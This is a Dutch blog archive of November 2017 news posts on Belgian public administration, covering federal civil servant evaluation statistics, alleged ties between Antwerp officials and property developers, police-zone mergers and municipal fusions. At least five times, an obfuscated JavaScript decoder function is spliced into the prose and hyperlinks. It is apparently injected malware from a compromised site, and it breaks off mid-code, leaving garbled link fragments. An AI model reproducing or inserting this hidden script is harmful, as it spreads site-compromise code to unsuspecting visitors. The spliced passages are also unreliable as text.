Archief november, 2017

Reacties uitgeschakeld voor Cijfers evaluatie federale overheid personeelsevaluatie

Cijfers evaluatie federale overheid personeelsevaluatie

Door | 30 november 2017 | Nieuws

Bron: cijfers Federale overheid ambtenarenzaken, cijfers evaluatie 2016

Sinds 1 november 2013 worden ambtenaren anders geëvalueerd dan voorheen. De evaluatie moest het mogelijk maken om goed presterende ambtenaren beter te kunnen belonen maar ook om de slecht presterende ambtenaren te kunnen sanctioneren. Uit een antwoord van minister Vandeput aan volksvertegenwoordiger Brecht Vermeulen blijkt dat de minister cijfers heeft van 80% van het totaal aantal ambtenaren. De manier waarop die evaluaties gebeuren, is evenwel niet overal hetzelfde. Sommige diensten, zoals de RSZ, maken gebruiken een ander computersysteem. Andere diensten werken nog steeds op papier.

Van de 53440 ambtenaren waarvoor cijfers beschikbaar zijn, hebben amper 39 een onvoldoende gekregen. Dit komt neer op amper 7 per 10.000 ambtenaren. De overgrote meerderheid (94%) krijgt een voldoende, terwijl iets meer dan 5% als uitzonderlijk wordt beschouwd. Voor 195 personen of 0,34% geldt ten slotte dat er verbeteringen mogelijk zijn.

uitzonderlijk voldoet aan de verwachtingen te verbeteren onvoldoende totaal
Federale overheidsdiensten 2 307 (5,81%) 37 247 (93,75%) 148 (0,37%) 28 (0,07%) 39 730
Instellingen van openbaar nut 77 (3,94%) 1 862 (95,34%) 11 (0,56%) 3 (0,15%) 1 953
Publieke instanties van sociale zekerheid 428 (4,13%) 9 908 (95,64%) 21 (0,20%) 3 (0,03%) 10360
Wetenschappelijke instellingen 85 (6,08%) 1 292 (92,48%) 15 (1,07%) 5 (0,36%) 1 397
Totaal 2 897 (5,42%) 50 309 (94,14%) 195 (0,36%) 39 (0,07%) 53 440

 

organisaties contractuelen statutairen Totaal
ministerie van landsverdediging 353 (23%) 1 153 (77%)  1 506
Federale overheidsdiensten 8 043 (17%) 40 244 (83%) 48 287
Programatorische overheidsdiensten 224 (48%) 238 (52%) 462
instellingen van openbaar nut 1 063 (26%) 2 958 (74%) 4 021
publieke instanties van sociale zekerheid 2 349 (21%) 8 749 (79%) 11 098
wetenschappelijke instellingen 1 425 (57%) 1 075 (43%) 2 500
Totaal 13 457 (20%) 54 417 (80%) 67 874

 

Reacties uitgeschakeld voor  “Maak werk van echte evaluatie ambtenaren”

 “Maak werk van echte evaluatie ambtenaren”

Door | 30 november 2017 | Nieuws

Bron : VRT-nieuws, 30/11/2017

Slechts 0,07 procent van de ambtenaren krijgt een slechte evaluatie. Dat blijkt uit cijfers die N-VA-Kamerlid Brecht Vermeulen heeft opgevraagd. Opvallend genoeg is de N-VA zélf verantwoordelijk voor de evaluaties van ambtenaren. “Opvallend dat er niets gebeurt bij de partij die pleit voor de kracht van verandering", zegt Kamerlid Vincent Van Quickenborne (Open VLD).

Van de 50.000 federale ambtenaren die vorig jaar een evaluatie kregen, hebben maar 40 werknemers een slechte evaluatie gehad. "Weinig geloofwaardig", klinkt het bij Brecht Vermeulen. Het N-VA-kamerlid dat de cijfers heeft opgevraagd.

De kritiek van N-VA is opvallend, want de minister die verantwoordelijk is voor de evaluaties is Steven Vandeput. Vandeput hoort ook bij N-VA.

Dat is ook Vincent Van Quickenborne van Open VLD niet ontgaan. "Het is toch vreemd dat een partij die pleit voor de kracht van verandering niets verandert in drie jaar tijd", zegt hij aan VRT NWS. "Het wordt dringend tijd dat Vandeput de procedures aanpast. Hij zal daarin een bondgenoot vinden bij onze partij."

Van Quickenborne wil dat overheidsbedrijven functioneren zoals "moderne organisaties". Daarmee bedoelt hij "dat mensen permanent gevauleerd worden. Mensen moeten kansen krijgen, maar men moet ook durven beslissen dat als iemand niet functioneert, die persoon geen plaats heeft in een organisatie."

De problemen met het evaluatiesysteem zijn niet nieuw. De vakbonden zitten samen met premier Charles Michel (MR) en minister van Ambtenarenzaken Steven Vandeput (N-VA) om het systeem bij te spijkeren. Daarvoor kijken ze in de richting van de privé, waar de evaluatiegesprekken steeds vaker worden ingeruild voor een vorm van permanente feedback.

 

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20171130_03216284">Lees De Standaard: Amper 7 op de 10.000 ambtenaren krijgen een slechte evaluatie: ‘Weinig geloofwaardig’

VRT-nieuws: Van Quickenborne bekritiseert N-VA: "Maak werk van echte evaluatie ambtenaren"

 

Reacties uitgeschakeld voor ‘Grensoverschrijdend gedrag’ bij Stad Antwerpen ?

‘Grensoverschrijdend gedrag’ bij Stad Antwerpen ?

Door | 27 november 2017 | Nieuws

Het rommelt de afgelopen dagen in Antwerpen.
De beschuldigingen van de oppositie omtrent integriteit.
De emotionele verklaring van burgemeester De Wever.
Oppositielid Meeuws die ook al contacten had met vastgoedontwikkelaars ?

De verklaringen van een GECORO-lid en de reactie daarop van UNIZO.
De alarmbel van de adviesraden.
De kritiek van de bouwmeester.
De samenwerking ambtenaren-politiek.

Gaat Antwerpen terug naar de politieke cultuur van de jaren 50 ?
Gaat het enkel over schepen Van de Velde ?
Gaat het over een rondje moddergooien met de verkiezingen in zicht ?
Is dit het topje van de ijsberg zoals sommigen beweren ?
Of ontbreekt het in Antwerpen aan goede samenwerking administratie -politiek ?

Antwerpse bouwcommissie: “De schepen luistert niet naar ons”

Bron: 27-11-17, 06.00u – De Morgen, Tine Peeters

1 Antwerps schepen Rob Van de Velde (l.) en bouwmeester Christian Rapp. De schepen krijgt andermaal zware kritiek.
De commotie over vastgoedprojecten in Antwerpen gaat maar niet liggen. Verschillende leden van de adviesraad (Gecoro) luiden de noodklok omdat de stad en bevoegd schepen Rob Van de Velde (N-VA) hun kritische adviezen naast zich neerlegt. "We worden teruggeworpen naar de jaren vijftig."

Ditmaal komt de kritiek op het stadsbestuur niet van de oppositie, maar wel van de adviserende bouwcommissie. In het jargon: de Gemeentelijke Commissie Ruimtelijke Ordening, kortweg Gecoro. Daarin zit het middenveld, maar ook experts zonder politieke kleur. Hun aanbevelingen zijn niet bindend.

"Het verschil met het vorige stadsbestuur is echt dag en nacht," zegt advocate Geert Lambrechts. Zij zetelt al jaren voor de vzw Samenlevingsopbouw in deze commissie. "De schepen luistert niet naar ons. Hij begrijpt het ook vaak gewoon niet. We worden in Antwerpen teruggeworpen naar de jaren vijftig. Nochtans heeft iedereen in de stad toch recht op een veilige en gezonde omgeving?"

 

Van kritisch naar gunstig

Het kantelpunt voor Lambrechts, maar ook andere leden, zoals Thomas Goorden (burgerraad) of Yves Heylen (Unizo) was hun advies over het parkeerbeleid in de nieuwe bouwcode. Voor de zomer formuleerden ze daar 'fundamentele bedenkingen' bij.

"Het was een uitgebreid en erg kritisch advies", bevestigt voorzitter Bram Abrams, onafhankelijk deskundige. Na de zomer bleek echter dat dit kritisch advies door de administratie de quotering 'gunstig onder voorwaarden' had gekregen. Omdat dit niet strookte met de inhoud van het advies, was er grote onrust binnen de Gecoro. Meerdere leden vermoeden politieke druk.

Thomas Goorden, die de tegenstelling tussen de inhoud van het advies en de quotering ontdekte, diende zelfs een klacht in bij de provincie wegens 'vervalsing van de feiten'. Die liet hem enkele dagen geleden weten dat ze niet kan oordelen over het dossier, maar dat hij wel naar de Raad van State kan stappen. Goorden heeft nog niet beslist of hij dat gaat doen.

Gecoro-voorzitter Abrams overlegde intussen met de stad, waardoor de adviezen voortaan zonder label 'gunstig' of 'ongunstig' worden doorgestuurd. Als de stad afwijkt van de adviezen, zal ze dat ook motiveren.

Toen dit werd besproken op de vergadering van de Gecoro op 8 november, was schepen van Stadsontwikkeling en Ruimtelijke Ordening Rob Van de Velde zelf aanwezig. "Hij kwam daar jammeren dat hij imagoschade had geleden omdat wij een dossier naar buiten hadden gebracht," zegt Lambrechts.

Yves Heylen, lid van Gecoro voor Unizo, bevestigt. "Hij is ons de levieten komen lezen en verbood ons nog publiekelijk over de adviesraad te spreken." Unizo Antwerpen laat wel weten dat Heylen niet namens hun organisatie spreekt. Heylen zat vroeger bij de liberale partij Open Brasschaat, maar is nu partijloos.

Van de Velde geeft toe dat hij naar de adviescommissie ging, maar nuanceert: "Ik ben het gaan uitleggen", zegt hij. "Meer niet. Maar er was een klacht ingediend wegens schriftvervalsing tegen een ambtenaar. Dat is zeer ernstig." Op die manier wou hij uitleg verschaffen en zijn administratie verdedigen.

 

Lief voor maar één kindje

Gecoro-lid Heylen ging in het actuaprogramma De zevende dag nog een stap verder dan de andere leden van de adviesraad. Hij had het over 'de liaison dangereuse tussen enkele bouwpromotoren en de Antwerpse politiek'. "Onze burgervader is niet lief voor vele kindjes, maar voor één welbepaald kindje."

Heylen doelt op Land Invest, waar Erik Van der Paal de stille vennoot is. Die project­ont­wik­ke­laar kwam de laatste weken in opspraak omdat hij te nauwe banden zou hebben met het stadsbestuur. "De politieke beïnvloeding sijpelt zelfs binnen in onze adviesraad", zei Heylen nog.

Voorzitter Abrams betreurt die uitval. "Dit college stapt wel eens over een advies, ja. Maar voel ik mij daardoor gepasseerd? Nee. Iedereen moet zijn job doen. Gebeurt het vaker dan vroeger? Vermoedelijk wel, maar Patrick Janssens deed het ook. Ik begrijp de frustratie en het ongenoegen, maar laten we het vooral over de inhoud hebben."

Burgemeester Bart De Wever (N-VA) was niet bereikbaar voor commentaar.

Reacties uitgeschakeld voor Zelfs lokaal kan men zich niet meer verplaatsen

Zelfs lokaal kan men zich niet meer verplaatsen

Door | 26 november 2017 | Nieuws

Burgemeesters trekken aan de alarmbel: “Onze dorpskernen slibben dicht”

Bron: De Standaard, 23/11/2017

1 Voormalig burgemeester en huidig schepen van Brasschaat Dirk De Kort (CD&V). © BELGA
Dirk De Kort (voormalig burgemeester en huidig schepen van Brasschaat), Bart Coopman (burgemeester Zemst), Jan Vermeulen (burgemeester Deinze), Jan Seynhaeve (burgemeester Wevelgem).

Het Vlaams Verkeerscentrum is duidelijk: in 2016 werden alle filerecords geklopt. De avondfiles werden gemiddeld 16 kilometer langer. In de regio Antwerpen groeiden de files in één jaar tijds zelfs met 11 procent. Ook 2017 dient zich aan als een recordjaar: juni was de zwaarste filemaand ooit, en dinsdag laatstleden noteerden we de ergste ochtendspits van het jaar. Om 8 uur telden we 445 kilometer file op onze wegen.

Bij ons overheerst een onbehaaglijk gevoel van traagheid. Een aantal recente berichten waren de spreekwoordelijke druppel die ons in de pen deed kruipen.

Reacties uitgeschakeld voor Lokaal bestuur en projectontwikkelaars: een te nauwe band ?

Lokaal bestuur en projectontwikkelaars: een te nauwe band ?

Door | 18 november 2017 | Nieuws

De integriteit van de politiek kwam deze week duidelijk in het nieuws.
Eén keer naar aanleiding van de PANO-rapportage over gesjoemel in Middelkerke, één keer naar aanleiding van belangenvermenging in Antwerpen.
Opvallend is dat ambtenaren vaak zicht hebben op de belangenvermenging tussen politiek en projectontwikkelaars.
Is de autonomie die lokale besturen vaak kunnen gebruiken bij het afleveren van vergunningen in die zin wel een goede zaak ?
Moet het vergunningenbeleid niet worden herzien ?
Dienen ambtenaren ‘vergunningen’ niet meer te worden beschermd ?

Casino van Middelkerke
Rond het nieuwe Casino van Middelkerke lijkt een sfeer van gesjoemel te hangen. Volgens de Vlaamse Bouwmeester Leo Van Broeck begint het project beter opnieuw.

“Trek de stekker eruit en begin opnieuw!”, zegt de Vlaamse Bouwmeester Leo Van Broeck, over het nieuwe Casino van Middelkerke. Het gaat om een belangrijk, duur, iconisch gebouw, maar het project lijkt te baden in een sfeer van gesjoemel, vriendjespolitiek, belangenvermenging. Ook de gerechtelijke politie onderzoekt de zaak. Burgemeester Janna Rommel-Opstaele verzekert Pano nochtans dat de procedure volgens het boekje verliep. Is een lokaal bestuur neutraal en onafhankelijk genoeg om hierover te beslissen? Pano-reporter Wim Van den Eynde gaat ook in Knokke en Koksijde op onderzoek. In Knokke is de familie van burgemeester Leopold Lippens al generaties lang actief in zowel lokale politiek als vastgoedontwikkeling. En ook in Koksijde is de burgemeester actief in het vastgoed. Jaren heeft Marc Vanden Bussche zijn burgemeesterschap gecombineerd met een bloeiend notariaat.

Bekijk de Pano-reportage

Lees achtergrondartikels op nieuwssite Apache

Antwerps schepencollege feest met vastgoedontwikkelaar
Ook het schepencollege in Antwerpen kwam in de kijker door de banden met projectontwikkelaars.
De bal werd aan het rollen gebracht door gefilmde opnames van de nieuwssite Apache aan de ingang van het restaurant.

Vooral het project Slachthuissite is erg omstreden. Na negatief advies van de eigen administratie, krijgt dit project positief politiek advies.

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20171116_03190576">Lees het artikel in De Standaard
function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndand-invest-mag-na-hetze-plots-woontorens-bouwen-in-antwerpen-vriendjespolitiek~a8f67d55/">Het Laatste Nieuws over vriendjespolitiek

Reacties uitgeschakeld voor Samenwerking op gebied van personeel tussen overheden

Samenwerking op gebied van personeel tussen overheden

Door | 17 november 2017 | Nieuws

Uit: ontwerpdecreet lokaal bestuur, 31/10/2017

De Vlaamse Regering neemt de nodige maatregelen voor de externe mobiliteit
van het personeel.

Afdeling 5. Samenwerking op het gebied van personeel
Art. 196. §1. De gemeente en het openbaar centrum voor maatschappelijk welzijn kunnen met een of meer overheden een samenwerkingsovereenkomst sluiten voor de gezamenlijke werving en selectie van hun personeel en, in voorkomend geval, om gemeenschappelijke wervingsreserves aan te leggen.
§2. Tussen de gemeente en het openbaar centrum voor maatschappelijk welzijn dat de gemeente bedient kunnen beheersovereenkomsten worden gesloten over het gemeenschappelijk gebruik van elkaars diensten.
In de beheersovereenkomst kan worden opgenomen dat de gemeente en het openbaar centrum voor maatschappelijk welzijn voor bepaalde functies een beroep kunnen doen op elkaars personeelsleden. Tegelijk kan worden bepaald dat de bevoegde organen hun beslissings- en ondertekeningsbevoegdheid kunnen toevertrouwen aan de personeelsleden van het andere bestuur binnen de grenzen vastgesteld in dit decreet.
Art. 197. Met uitzondering van de personeelsleden, vermeld in artikel 162, §1, kan de gemeenteraad personeel overdragen aan het openbaar centrum voor maatschappelijk welzijn dat de gemeente bedient, op voorwaarde dat de geldende rechtspositieregeling van het gemeentepersoneel nageleefd wordt en na goedkeuring van de raad voor maatschappelijk welzijn. De Vlaamse Regering kan daarvoor de minimale voorwaarden vaststellen.
Met uitzondering van de personeelsleden, vermeld in artikel 183, §1, kan de raad voor maatschappelijk welzijn personeel overdragen aan de gemeente die door het openbaar centrum voor maatschappelijk welzijn wordt bediend, op voorwaarde dat de geldende rechtspositieregeling van het personeel nageleefd wordt, en na goedkeuring van de gemeenteraad van de gemeente die door het openbaar centrum voor maatschappelijk welzijn wordt bediend. De Vlaamse Regering kan daarvoor de minimale voorwaarden vaststellen.

Reacties uitgeschakeld voor ‘Fusie politiezones is een slogan, geen oplossing’

‘Fusie politiezones is een slogan, geen oplossing’

Door | 14 november 2017 | Nieuws

Het organisatiemodel van de overheid is er alvast één dat zoekend is. Fusies van gemeenten of samenwerking ?

Dezelfde vraag stelt zich bij de politiezones.

Ondersteunen we enkel het fusiemodel, of is samenwerking een betere piste.

Bron: De Standaard, 14/11/2017

Philippe Close: ‘Fusie politiezones is een slogan, geen oplossing’

De Brusselse burgemeester Philippe Close (PS) is niet gewonnen voor een fusie van de politiezones in zijn stad. Nochtans is de roep naar een eengemaakte politiezone in de hoofdstad opnieuw sterk toegenomen nadat relschoppers zaterdagavond vernieling zaaiden in het centrum van Brussel.

Nadat de nationale voetbalploeg van Marokko zich zaterdagavond ten koste van Ivoorkust wist te plaatsen voor het WK Voetbal in Rusland, zakten enkele honderden supporters af naar het Brusselse Beursplein. function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20171113_03183620" target="_blank" rel="noopener">Daar braken al snel rellen uit tussen amokmakers en de ordediensten.

 

In de buurt rond de Beurs vernielden en plunderden vandalen winkels en staken ze verschillende wagens in brand. Een twintigtal agenten raakten gewond, niemand werd opgepakt.

 

Bij Terzake op Canvas noemde burgemeester Close de feiten ‘onaanvaardbaar. Hier is geen verklaring voor. Het zijn vandalen.’ De PS’er beseft dat het voor de bevolking ‘moeilijk te begrijpen is’ dat er uiteindelijk niemand werd opgepakt. ‘De eerste taak van de politie was om de rust terug te brengen. Ze heeft een goede job gedaan’, aldus Close. ‘Nu is het tijd voor arrestaties.’

Slogans

En ook voor een evaluatie. Maandagvoormiddag vond er al een debriefing plaats van de incidenten. ‘Misschien moeten we de procedures verbeteren’, zei Close daar alvast over.

Maar een politiefusie, waar verschillende politieke fracties om vragen, is niet aan de orde - dat zijn ‘slogans’, vindt Close. ‘Er is al een goede samenwerking tussen de verschillende politiezones. Een fusie is niet de juiste oplossing.’

Reacties uitgeschakeld voor Puurs en Sint-Amands stellen nieuwe gemeentenaam voor

Puurs en Sint-Amands stellen nieuwe gemeentenaam voor

Door | 12 november 2017 | Nieuws

vr 10 november 2017

Op 18 september 2017 verklaarden de gemeenteraden van Puurs en Sint-Amands zich principieel akkoord met een bestuurlijke fusie van beide gemeenten. Op maandag 20 november 2017 nemen beide gemeenteraden dan de definitieve beslissing rond de fusie.

Tijdens die gemeenteraadszitting zal ook de nieuwe naam vastgelegd worden. Na de gemeenteraden stemt het Vlaams Parlement nog over een definitief fusiedecreet. De nieuwe gemeente is dan vanaf 1 januari 2019 een feit.

De naam voor de nieuwe gemeente wordt Puurs-Sint-Amands, waarbij uiting wordt gegeven aan de complementariteit van beide gemeenten. Puurs is een economisch sterke gemeente met heel veel werkgelegenheid. Sint-Amands heeft met haar idyllische ligging aan de Schelde dan weer een toeristische troef in handen.

De voorbije weken hebben de verschillende diensten van beide besturen al het nodige voorbereidende werk geleverd om de praktische aspecten van de fusie in kaart te brengen en deze in de komende maanden verder uit te werken. Sommige diensten van beide besturen zullen al in 2018 en dus voor de feitelijke fusie samenwerken om de dienstverlening naar de burgers te verbeteren. Er wordt tevens getracht om de administratieve rompslomp van deze naamsverandering voor de burgers tot een minimum te beperken.

Meer informatie over de fusieplannen van Puurs en Sint-Amands zijn terug te vinden op function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndands.be">www.puurs-sint-amands.be.

Reacties uitgeschakeld voor Moeten we om te moderniseren vaste benoemingen afbouwen ?

Moeten we om te moderniseren vaste benoemingen afbouwen ?

Door | 12 november 2017 | Nieuws

Bij het Spoor blijven vaste benoemingen de norm. De vaste benoeming is daar echter ook een loopbaanmiddel voor contractuelen.
Is de vaste benoeming een keuze in het loopbaanbeleid van de NMBS of een uiting dat de modernisering uit blijft.

bron: 10-11-17, De Morgen

HR Rail, de personeelsdienst van de spoorwegen, bevestigt dat de maatregelen nog niet zijn doorgevoerd. “Statutaire aanwervingen zijn nog de norm”, zegt woordvoerster Kim Buggenhout. Van de 1.897 personeelsleden die dit jaar bij het spoor werden aangenomen, waren er slechts 202 op basis van een arbeidscontract.

Kan niet, vindt coalitiepartner N-VA. De Coninck: “Wij hebben de indruk dat minister Bellot de modernisering probeert te begraven. De afspraak deze zomer was duidelijk: het akkoord moet worden toegepast. Maar de minister lijkt niet echt gehaast.”

Het afschaffen van de vaste benoemingen is niet de enige ambtenarenhervorming die op zich laat wachten. Zo blijft de pensioenleeftijd voor het treinpersoneel en de militairen voorlopig behouden op 55 en 56 jaar. De afbouw van de gunstregimes gaat dan toch niet in vanaf volgend jaar, zo blijkt uit de beleidsnota van minister van Pensioenen Daniel Bacquelaine (MR) waarover De Tijd gisteren berichtte.

De regering had afgesproken dat de leeftijdsvoorwaarde volgend jaar naar 57 jaar zou stijgen. De daaropvolgende jaren zou daar telkens een half jaar bijkomen. Maar die verhoging gaat voorlopig niet door. De gesprekken tussen de regering en de overheidsbonden over de invulling van de zware beroepen is immers nog aan de gang.

Door te wachten met de verstrenging hoopt Bacquelaine goodwill te creëren bij de bonden. Pas als de lijst met zware beroepen definitief is, treedt de geleidelijke verhoging van de pensioenleeftijd in werking. Dat zou begin 2019 zijn.

Reacties uitgeschakeld voor ‘Pelt’ wordt nieuwe Limburgse fusiegemeente.

‘Pelt’ wordt nieuwe Limburgse fusiegemeente.

Door | 5 november 2017 | Nieuws

Overpelt en Neerpelt kiezen langverwachte naam voor nieuwe fusiegemeente

De Standaard: 04/11/2017

De nieuwe Limburgse fusiegemeente die ontstaat door het samensmelten van Overpelt en Neerpelt, zal ‘Pelt’ heten. Dat werd vanavond onder grote belangstelling bekendgemaakt. Als beide gemeenteraden in december hun goedkeuring geven, is de fusie vanaf 2019 een feit.

De naam van de toekomstige fusiegemeente werd vanavond bekendgemaakt op het Overpeltse marktplein. Daar vond het traditionele vuurspektakel voor Sint-Maarten plaats.

9.519 inwoners van Overpelt en Neerpelt brachten hun stem uit voor de naamsverandering. Dommelpelt, Pelten of Pelt. Meer dan 74 procent van de stemmen ging naar Pelt, een ruime meerderheid.

'Ideaal moment voor een fusie'

Beide burgemeester zijn tevreden met de naam. 'Ik heb zelf ook op Pelt gestemd', zegt Jaak Fransen, burgemeester van Overpelt. 'De naam is eigenlijk heel logisch. Pelt verwijst naar de locatie van beide gemeenten. Vroeger waren we samen Pelt, nadien zijn we gesplitst en nu zijn we opnieuw samen onder dezelfde naam.'

Burgemeester Raf Drieskens van Neerpelt is tevreden dat beide gemeenten nu verder aan de slag kunnen met het fusieproces. 'Ik sta hier met een goed gevoel', aldus Drieskens. 'De inwoners moeten op ons kunnen rekenen en samen gaan we dat beter kunnen verwezenlijken dan apart.'

Volgens de burgemeesters is het nu het perfecte moment om een fusie aan te gaan. 'We kunnen nu een fusie realiseren zonder veel problemen', zegt Fransen. 'Als we het niet doen, zal het ons later misschien verplicht worden, maar ik vermoed dan wel zonder de financiële meevallers die we vandaag wel krijgen.'